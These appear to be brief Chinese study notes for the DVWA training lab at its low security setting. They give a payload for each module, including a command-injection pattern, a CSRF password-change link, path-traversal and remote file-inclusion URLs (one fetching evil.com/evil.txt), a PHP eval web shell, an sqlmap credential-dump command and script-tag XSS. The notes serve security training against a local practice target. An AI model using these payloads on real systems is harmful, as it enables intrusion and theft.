DVWA: low
Brute Force(暴力(破解))
BurpSuite爆破
Command Injection(命令行注入)
‘IP地址’+‘&&’+‘任意代码’
CSRF(跨站请求伪造)
构造链接
http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=TooYoungTooSimple&password_conf=TooYoungTooSimple&Change=Change#
File Inclusion(文件包含)
本地:构造链接(任意文件访问)
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=../../../../WWW/l.php
远程:构造链接(任意代码执行)
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page= http://www.evil.com/evil.txt
File Upload(文件上传)
antSword
上传ant.php:<?php eval($_POST['ant']); ?>
Insecure CAPTCHA (不安全的验证码)
SQL Injection(SQL注入)
BurpSuite抓包,Sqlmap注入
1' and + (sql指令) 手注
SQL Injection(Blind)(SQL盲注)
BurpSuite抓包,Sqlmap注入
Sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users -C password,users --dump
Weak Session IDs
Burp Sequencer
XSS(DOM)
<script>(任意代码)</script>
XSS(Reflected)(反射型跨站脚本)
<script>(任意代码)</script>
XSS(Stored)(存储型跨站脚本)
<script>(任意代码)</script>
CSP Bypass
JavaScript